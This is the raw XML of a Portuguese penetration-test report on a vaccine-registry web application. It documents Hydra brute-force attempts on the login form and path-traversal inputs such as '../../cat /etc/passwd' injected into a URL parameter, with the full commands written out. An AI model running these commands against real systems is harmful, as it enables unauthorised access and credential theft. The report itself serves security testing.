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6DC7" w:rsidRPr="00A63EAA" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63EAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Resultados detalhados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008B447D" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B447D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Nessa sessão, serão relatados, de forma detalhada, os resultados obtidos na execução dos testes em cada iteração planejada. Serão apresentados os passos utilizados para detectar possíveis vulnerabilidades, as vulnerabilidades encontradas e quais danos estas podem causar caso sejam exploradas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00A63EAA" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="993" w:hanging="284"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63EAA">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Iteração 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00191402" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00191402">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tela Login - Exploração via Força Bruta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dia 01/04/16.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Duração 1hora e 20 minutos.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708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Objetivo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Utilizar a ferramenta Hydra para adivinhar, por tentativa e erro, um login de um usuário e senha válidos para efetuar login no Sistema de Vacinas para verificar se a tela de Login não é vulnerável a ataques de força bruta.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708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708" w:firstLine="708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Resultados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708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Tentativa 1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Configurar a Hydra com 3 parâmetros para que ela realize os testes de acesso com força bruta na tela de Login.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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44803">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Impedimento</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44803">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hydra não está reclamando de 3 parâmetros quando, a tela de Login só utiliza 2.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>: Indefinido.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708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708"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00736DBC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Tentativa 2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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736DBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Inserir um login de usuário válido e possíveis senhas mais comuns utilizadas para acesso</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> de um sistema </w:t>
      </w:r>
      <w:r w:rsidRPr="006E7A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">e ser </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>bloqueado de alguma forma.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00736DBC" w:rsidRDefault="008C6DC7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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00736DBC" w:rsidRDefault="008C6DC7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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736DBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Configurar o número de 16 tentativas de acesso na ferramenta Hydra.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00CD0164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D9D9D9" w:themeColor="background1" w:themeShade="D9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Comando utilizado: hydra -l admin -P forcaBruta IP_do_servidor http-post-form “vacina/login.php:login=^USER^:senha=^PASS^:logado=false”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No comando acima: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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="006E7A00" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2136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“-l” significa o login utilizado no momento. Nesse caso, deve ser sempre “admin”, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E7A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pois foi o único usuário válido fornecido para a realização de testes no Sistema de Vacinas;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2136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“-P” aponta para o arquivo contendo as senhas que a Hydra tentará utilizar para fazer o login;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2136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IP_do_servidor é o IP onde está hospedada a aplicação alvo;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2136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“http-post-form” é o método utilizado, no caso , POST do HTTP;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2136" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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“vacina/login.php:login=^USER^:senha=^PASS^:logado=false”  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>é a URL utilizada para fazer a requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2856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USER é onde a Hydra deve inserir o login válido usado na requisição;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2856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PASS é onde a Hydra deve inserir a senha válida usada na requisição.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Resultado:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste.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Tentativa 3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Configurar a ferramenta Hydra para executar tentativas utilizando o login “admin”, cadastrado na base de dados do sistema. Além disso, usar um dicionário de senhas retiradas da </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lista de Piores Senhas de 2015</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> da SplashData [1]. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00CD0164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D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E7A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Esperava-se que o sistema possuísse algum tipo de controle.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/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Comando utilizado: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 hydra -l admin -P forcaBruta IP_do_servidor http-post-form “vacina/login.php:login=^USER^:senha=^PASS^:logado=false” -V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No comando acima:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="006E7A00" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs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“-l” significa o login utilizado no momento. Deve ser sempre admin, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E7A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pois é foi único usuário válido fornecido para a realização de testes no Sistema de Vacinas;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs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 w:rsidRPr="006E7A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>“-P” aponta para o arquivo contendo as senhas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> que a Hydra tentará utilizar;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs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IP_do_servidor é o IP onde está hospedada a aplicação;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs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“http-post-form” é o método utilizado, no caso , POST do HTTP;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">vacina/login.php:login=^USER^:senha=^PASS^:logado=false”  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>é a URL utilizada para fazer a requisição;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="356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USER é onde a Hydra deve inserir o login válido usado na requisição;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="356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PASS é onde a Hydra deve inserir a senha válida usada na requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs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“-V” é para exibir no console o resultado da operação.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Resultado:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Não passou no teste. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E7A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Entretanto,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> a execução do teste mostrou que o sistema é vulnerável ao acesso via força </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>bruta</w:t>
      </w:r>
      <w:r w:rsidRPr="006E7A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>. A Figura 1 mostra que embora várias tentativas tenham sido realizadas sem sucesso de login, o sistema permite que várias requisições sejam feitas ao servidor por tempo indeterminado. Como não há mecanismo de bloqueio para inúmeras requisições de login, o sistema abre uma brecha para que senhas de acesso ao sistema possam ser descobertas após várias tentativas.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="00654DEF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  <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="3820160"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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                                             Figura 1 - Resultado da operação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 w:line="240" w:lineRule="auto"/>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F018F3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F018F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tela Login - Exploração via Path Transversal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7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 w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1416"/>
        <w:jc w:val="both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entre os dias 31/03/16 e 01/04/16.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Duração: 2 horas e 30 minutos.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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00BC5B4A" w:rsidRDefault="008C6DC7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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC5B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Um scanner foi realizado através da ferramenta Burp Suite para identificar a estrutura de diretórios do sistema dentro do servidor.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  <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E7A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Os resultados obtidos, conforme mostra a figura 2, foram utilizados para executar os testes deste tópico.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.</w:t>
      </w:r>
      <w:r w:rsidR="00654DEF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="402145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Figura 2 - Resultado mapeamento diretórios do sistema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Objetivo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  <w:r w:rsidRPr="0094663B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Através dos parâmetros enviados pela URL e utilizados pela aplicação para realizar login, tentar navegar em diretórios da aplicação dentro do servidor. Dessa forma, conseguir acesso a locais não autorizados a um usuário do sistema. Foram utilizados os seguintes comandos “ ../../” para tentar realizar a navegação de pastas.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jc w:val="center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Resultados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  <w:b/>
          <w:bCs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Tentativa 1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Quando o sistema não consegue efetuar um login, o seguinte parâmetro é exibido na url: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>vacina/login.php?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>logado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=false.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="0027155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color w:val="000000"/>
        </w:rPr>
        <w:t>A primeira tentativa foi fazer uma requisição ao servidor alterando a url citada anteriormente para: v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">acina/login.php?logado=../../dir, </w:t>
      </w:r>
      <w:r w:rsidRPr="0094663B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>a fim de verificar se o sistema não permite a navegação dentro das pastas armazenadas no servidor que hospeda o Sistema de Vacinas.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3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O comando “../../” foi utilizado para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor no qual a aplicação está hospedada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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O comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">dir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> no cmd do Windows serve para listar os arquivos e diretórios dentro da pasta atual.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>: Passou no teste.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Tentativa 2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8A79EE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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Fazer uma requisição ao servidor utilizando a url </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">vacina/login.php?logado= ../../cat /etc/passwd, </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>a fim de verificar se o sistema não permite a navegação dentro das pastas armazenadas no servidor que hospeda o Sistema de Vacinas.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 w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Foi esperado que o sistema realizasse algum bloqueio para impedir o acesso.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4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comando  “../../” foi utilizado para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor no qual a aplicação está hospedada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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O comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/passwd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, no sistema operacional Linux, serve para listar o conteúdo de passwd (local onde ficam armazenados informações de senha dos usuários). </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Como o sistema operacional do servidor em questão é Windows, então caso seja executado, o esperado seria um erro.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00736DBC" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
